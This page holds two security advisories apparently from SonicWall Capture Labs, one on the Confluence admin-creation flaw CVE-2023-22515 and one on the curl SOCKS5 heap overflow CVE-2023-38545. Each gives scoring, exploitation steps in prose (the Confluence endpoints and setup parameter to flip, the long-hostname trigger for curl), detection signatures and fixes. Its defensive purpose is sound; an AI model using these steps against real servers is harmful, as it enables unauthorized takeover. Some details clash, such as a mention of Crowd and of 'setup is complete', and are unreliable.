The SonicWall Capture Labs Threat Research team has observed attackers targeting a critical vulnerability affecting on-premises instances of Confluence Server and Confluence Data Center allowing unauthorized users to get administrative-level privileges by creating unauthorized Confluence administrator accounts. The vulnerability is categorized as a Broken Access Control issue and has a CVSS base score of 10.0. CISA has warned that nefarious activists exploited CVE-2023-22515 as a zero-day to retrieve legitimate access over victim systems. Atlassian described this vulnerability initially as Privilege Escalation but later categorized it as Broken Access Control and released an advisory on October 4th, 2023 for CVE-2023-22515. The vendor has classified this vulnerability as Broken Authentication and Session Management (BASM). Atlassian Cloud sites are not affected by this vulnerability. Vulnerable software versions include 8.0.0-8.0.3, 8.1.0, 8.1.3-4, 8.2.0-8.2.3, 8.3.0-8.3.2, 8.4.0-8.4.2, 8.5.0-1.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-22515.

The overall CVSS score is 10. (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:O/RC:C).

The base score is 10 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H), based on the following metrics:

  •Attack vector is network.
  •Attack complexity is low.
  •Privileges required is none.
  •User interaction is none.
  •Scope is changed.
  •Impact of this vulnerability on data confidentiality is high.
  •Impact of this vulnerability on data integrity is high.
  •Impact of this vulnerability on data availability is high.

Temporal score is 9.4 (E:P/RL:O/RC:C), based on the following metrics:

  •The exploit code maturity level of this vulnerability is proof of concept code.
  •The remediation level of this vulnerability is official fix.
  •The report confidence level of this vulnerability is confirmed.

Technical Overview

Atlassian Confluence Data Center is a self-managed edition of Confluence, built to support organizations’ size, complexity and governance needs.

To trigger the vulnerability, an unauthenticated attacker can modify the Confluence server’s configuration to indicate the setup is not complete and use the /setup/setupadministrator.action endpoint to create a new administrator user. The vulnerability is triggered via a single request using the URI /server-info.action endpoint

Exploitation

CVE-2023-22515 can be exploited in a series of steps. The followings steps will demonstrate how RCE is obtained on Atlassian Crowd:

Before manipulating the parameters let us first observe a basic login request.

Next, we can trick the server into believing the configuration hasn’t been completed by setting “applicationConfig.setupComplete” to false.

Once the server believes setup is complete, we can use the setupadministrator.action to try and create an administrative level account passing the desired username and password.

As a result of the last request, a new account is created by the attacker that will allow a successful login to attempt with the attacker’s credentials.

 

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signatures have been released:
  • IPS:15926 - Confluence Data Center and Server Privilege Escalation
  • IPS:19383 - Confluence Data Center and Server Privilege Escalation 2
  • IPS:19382 - Confluence Data Center and Server Privilege Escalation 3

Threat Graphs

SonicWall sensors have confirmed active exploitation of these vulnerabilities. The graph below indicate an increasing number of exploitation attempts over the last 40 days:

Remediation Recommendations

Admins still running one of the vulnerable software versions should upgrade Confluence Data Center and Data Servers to version 8.3.3 or later, 8.4.3 or later, or 8.5.2 or later.

If that’s not possible, users can mitigate the issue by blocking access to the /setup/* endpoints on Confluence instances. Further steps to mitigate are dictated on an official link.

Relevant Links

/by
,

curl SOCKS5 Heap overflow Vulnerability

SonicWall Capture Labs Threat Research Team became aware of the threat, assessed its impact, and developed mitigation measures for the curl SOCKS5 heap buffer overflow vulnerability released this week.

Overview

Client URL, or curl, and its library version libcurl are one of the most popular and integrated command line tools for data transfer. They support a wide range of protocols such as HTTP, HTTPS, SMTP and FTP and enable the user to make requests to a URL while handling all standard components of requests such as cookies, authentication and proxies. On October 11, a high-severity heap-based buffer overflow vulnerability was publicly disclosed in curl versions 7.69.0 to, and including, 8.3.0. For an attacker to leverage this vulnerability, they would need to control the hostname being accessed by curl through a SOCKS5 proxy, and the server would need to respond “slowly.” Typical server latency is likely slow enough to trigger this vulnerability without needing a DoS attack or SOCKS server control. It is recommended that all instances of curl and libcurl be updated to version 8.40. Currently, it is suspected, yet not proven, that this flaw can lead to remote code execution. Due to the restraints required for exploitation, it is currently unclear what the likelihood of exploitation in the wild is at this time.

CVE Details

This vulnerability has been assigned the Common Vulnerabilities and Exposures (CVE) identifier CVE-2023-38545.
The overall CVSS score is 7.5 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H). Base score is 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H), based on the following metrics:

  • Attack vector is network.
  • Attack complexity is low.
  • Privileges required is none.
  • User interaction is none.
  • Scope is unchanged.
  • Impact of this vulnerability on data confidentiality is none.
  • Impact of this vulnerability on data integrity is none.
  • Impact of this vulnerability on data availability is high.

Technical Overview

SOCKS5 is a proxy protocol for setting up network communication via a dedicated middle application. Tor uses the protocol and is often used to bypass internet restrictions or access blocked websites. When attempting to resolve a DNS name, SOCKS5 has two different resolvers: Either the client resolves the hostname locally and passes on the destination as a resolved address, or the client passes on the entire host name to the proxy and the proxy itself resolves the host remotely. Ultimately the curl vulnerability exists when a hostname larger than 255 bytes is attempted to be resolved by the local resolve mode. This can be seen from the source code in the image below. If the SOCKS5 server is delayed in its response, the curl state machine returns with the local resolver selected, but the next time the curl state machine is called, it has no knowledge of the hostname’s length. It now tries first to resolve the name using the remote resolver by building a protocol frame in a memory buffer assuming the name is less than 255 bytes and then copying the destination hostname to the too-small buffer. It\'s also important to consider the conditions which allow this code path to be taken. libcurl uses a variable named CURLOPT_BUFFERSIZE to determine how large to allocate the download buffer. By default, the curl tool sets CURLOPT_BUFFERSIZE to 100kB and is therefore not vulnerable. An overflow is only possible in applications that do not set CURLOPT_BUFFERSIZE or set it smaller than 65541.

Triggering the Vulnerability

To trigger this vulnerability, curl needs to access a long hostname through a SOCKS5 proxy. For testing, this can be set up through a locally running Python SOCKS5 proxy server. A single curl command (using version 7.74) can be sent to trigger a segmentation fault. Running the same setup with the addition of GDB monitoring curl, it is possible to see the backtrace and exact vulnerability conditions. This highlights that the vulnerability exists within the resolvers. A segmentation fault occurs when the contents of register $RDI are attempted to be resolved as a pointer. Consider the disassembly from GDB below at the point of the segmentation fault: By inspecting the value of $RDI, it is possible to see the heap buffer overflow has caused the register to be overwritten.

Exploitation

Currently, it hasn’t been proven that this vulnerability can be turned into a fully functional, weaponizable exploit; however, considering the nature of memory corruption, depending on compiled time and runtime migrations in place, it is likely that a weaponizable exploit is possible. One possible method of exploitation, as outlined by Daniel Stenberg, would be for an attacker to leverage an HTTP 30x redirect response over a SOCKS5 proxy. The response would contain a location header, which would include a malicious hostname that is longer than 16KB.

SonicWall Protections

To ensure SonicWall customers are prepared for any exploitation that may occur due to this vulnerability, the following signature has been released:

  • IPS 15927 : SOCKS5 Heap Buffer Overflow

Remediation Recommendations

To mitigate or eliminate the risk posed by this vulnerability, it is recommended to:

  • Upgrade curl to version 8.4.0 or
  • Apply the patch to your local version or
  • Do not use CURLPROXY_SOCKS5_HOSTNAME proxies type with curl

Relevant Links

/by